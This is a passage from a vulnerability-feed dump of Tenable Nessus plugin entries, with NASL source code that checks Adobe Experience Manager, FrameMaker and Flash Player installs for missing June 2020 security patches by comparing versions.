script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:experience_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_experience_manager_http_detect.nbin\");\n script_require_keys(\"installed_sw/Adobe Experience Manager\");\n script_require_ports(\"Services/www\", 4502, 4503);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nport = get_http_port(default:4502);\n\napp_info = vcf::get_app_info(app:'Adobe Experience Manager', port:port);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.1', 'fixed_version' : '6.4.8.1'},\n { 'min_version' : '6.5', 'fixed_version' : '6.5.5.0'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:29", "description": "The version of Adobe FrameMaker installed on the remote Windows host is prior to 15.0.6 . It is, therefore, affected by a the following vulnerabilities :\n\n - An unspecified memory corruption error exists that allows arbitrary code execution (CVE-2020-9634)\n\n - An unspecified out of bounds error exists that allows arbitrary code execution. (CVE-2020-9635, CVE-2020-9636)", "cvss3": {}, "published": "2020-06-11T00:00:00", "type": "nessus", "title": "Adobe FrameMaker < 15.0.6 (aka 2019.0.6) Multiple Vulnerabilities (APSB20-32)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9634", "CVE-2020-9635", "CVE-2020-9636"], "modified": "2020-09-11T00:00:00", "cpe": ["cpe:/a:adobe:framemaker"], "id": "ADOBE_FRAMEMAKER_APSB20-32.NASL", "href": "https://www.tenable.com/plugins/nessus/137362", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137362);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/11\");\n\n script_cve_id(\"CVE-2020-9634\", \"CVE-2020-9635\", \"CVE-2020-9636\");\n script_xref(name:\"IAVB\", value:\"2020-B-0032-S\");\n\n script_name(english:\"Adobe FrameMaker < 15.0.6 (aka 2019.0.6) Multiple Vulnerabilities (APSB20-32)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote install of Adobe FrameMaker has Multiple Vulnerabilities (APSB20-32).\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe FrameMaker installed on the remote Windows host\nis prior to 15.0.6 . It is, therefore, affected by a the following\nvulnerabilities :\n\n - An unspecified memory corruption error exists that allows\n arbitrary code execution (CVE-2020-9634)\n\n - An unspecified out of bounds error exists that allows\n arbitrary code execution. (CVE-2020-9635, CVE-2020-9636)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/framemaker/apsb20-32.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe FrameMaker 15.0.6 (aka 2019.0.6) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9636\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:framemaker\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_framemaker_installed.nbin\");\n script_require_keys(\"installed_sw/Adobe FrameMaker\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\napp_info = vcf::get_app_info(app:\"Adobe FrameMaker\", win_local:TRUE);\n\n# fixed is 15.0.6 (aka 2019.0.6)\nconstraints = [{\"fixed_version\":\"15.0.6\", \"fixed_display\":\"15.0.6 (aka 2019.0.6)\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-13T14:32:14", "description": "The version of Adobe Flash Player installed on the remote macOS or Mac OS X host is equal or prior to version 32.0.0.371. It is therefore affected by an use after free vulnerability. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to execute arbitrary code within the context of the user.", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "Adobe Flash Player for Mac <= 32.0.0.371 (APSB20-30)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9633"], "modified": "2020-10-16T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB20-30.NASL", "href": "https://www.tenable.com/plugins/nessus/137252", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137252);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/16\");\n\n script_cve_id(\"CVE-2020-9633\");\n script_xref(name:\"IAVA\", value:\"2020-A-0246-S\");\n\n script_name(english:\"Adobe Flash Player for Mac <= 32.0.0.371 (APSB20-30)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote macOS or Mac OSX host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote macOS or Mac OS X host is equal or prior to version\n32.0.0.371. It is therefore affected by an use after free vulnerability. An unauthenticated, remote attacker can exploit\nthis, via a specially crafted file, to execute arbitrary code within the context of the user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb20-30.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 32.0.0.387 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9633\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\ncutoff_version = \"32.0.0.371\";\nfix = \"32.0.0.387\";\n# We're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:59", "description": "The remote host is affected by the vulnerability described in GLSA-202006-09 (Adobe Flash Player: Arbitrary code execution)\n\n An unspecified flaw has been discovered in Adobe Flash Player.\n Impact :\n\n This flaw can be exploited by attackers for remote code execution.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2020-06-17T00:00:00", "type": "nessus", "title": "GLSA-202006-09 : Adobe Flash Player: Arbitrary code execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9633"], "modified": "2020-10-16T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:adobe-flash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202006-09.NASL", "href": "https://www.tenable.com/plugins/nessus/137446", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202006-09.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137446);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/16\");\n\n script_cve_id(\"CVE-2020-9633\");\n script_xref(name:\"GLSA\", value:\"202006-09\");\n script_xref(name:\"IAVA\", value:\"2020-A-0246-S\");\n\n script_name(english:\"GLSA-202006-09 : Adobe Flash Player: Arbitrary code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202006-09\n(Adobe Flash Player: Arbitrary code execution)\n\n An unspecified flaw has been discovered in Adobe Flash Player.\n \nImpact :\n\n This flaw can be exploited by attackers for remote code execution.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb20-30.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/202006-09\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-32.0.0.387'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9633\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 32.0.0.387\"), vulnerable:make_list(\"lt 32.0.0.387\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:53", "description": "The remote Windows host is missing security update KB4561600. It is, therefore, affected by an use after free vulnerability. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to execute arbitrary code within the context of the user.", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561600: Security update for Adobe Flash Player (June 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9633"], "modified": "2020-10-16T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "SMB_NT_MS20_JUN_FLASH.NASL", "href": "https://www.tenable.com/plugins/nessus/137265", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137265);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/16\");\n\n script_cve_id(\"CVE-2020-9633\");\n script_xref(name:\"MSKB\", value:\"4561600\");\n script_xref(name:\"MSFT\", value:\"MS20-4561600\");\n script_xref(name:\"IAVA\", value:\"2020-A-0246-S\");\n\n script_name(english:\"KB4561600: Security update for Adobe Flash Player (June 2020)\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4561600. It is, therefore, affected by an use after free\nvulnerability. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to execute arbitrary\ncode within the context of the user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb20-30.html\");\n # https://support.microsoft.com/en-us/help/4561600/security-update-for-adobe-flash-player\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aed1c537\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4561600 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9633\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-06\";\nkbs = make_list('4561600');\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\niver = join(iver, sep:\".\");\n\n# all <= 32.0.0.371\nfix = FALSE;\nif(ver_compare(ver:iver, fix:\"32.0.0.371\", strict:FALSE) <= 0)\n fix = \"32.0.0.387\";\n\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n fix\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:hotfix_get_report() + report);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-13T14:33:26", "description": "The remote Redhat Enterprise Linux 6 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:2547 advisory.\n\n - flash-plugin: Arbitrary Code Execution vulnerability (APSB20-30) (CVE-2020-9633)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-06-17T00:00:00", "type": "nessus", "title": "RHEL 6 : flash-plugin (RHSA-2020:2547)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9633"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:rhel_els:6", "cpe:/o:redhat:rhel_eus:6.0", "p-cpe:/a:redhat:enterprise_linux:flash-plugin"], "id": "REDHAT-RHSA-2020-2547.NASL", "href": "https://www.tenable.com/plugins/nessus/137409", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2547. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137409);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\"CVE-2020-9633\");\n script_xref(name:\"RHSA\", value:\"2020:2547\");\n script_xref(name:\"IAVA\", value:\"2020-A-0246-S\");\n\n script_name(english:\"RHEL 6 : flash-plugin (RHSA-2020:2547)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has a package installed that is affected by a vulnerability as referenced in\nthe RHSA-2020:2547 advisory.\n\n - flash-plugin: Arbitrary Code Execution vulnerability (APSB20-30) (CVE-2020-9633)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-9633\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1845700\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-plugin package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9633\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_els:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '6')) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/client/6/6Client/i386/debug',\n 'content/dist/rhel/client/6/6Client/i386/optional/debug',\n 'content/dist/rhel/client/6/6Client/i386/optional/os',\n 'content/dist/rhel/client/6/6Client/i386/optional/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/oracle-java-rm/os',\n 'content/dist/rhel/client/6/6Client/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/os',\n 'content/dist/rhel/client/6/6Client/i386/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/debug',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/os',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/os',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/client/6/6Client/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/os',\n 'content/dist/rhel/client/6/6Client/x86_64/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/os',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/debug',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/debug',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/os',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/debug',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/os',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/optional/debug',\n 'content/dist/rhel/server/6/6Server/i386/optional/os',\n 'content/dist/rhel/server/6/6Server/i386/optional/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/oracle-java-rm/os',\n 'content/dist/rhel/server/6/6Server/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/os',\n 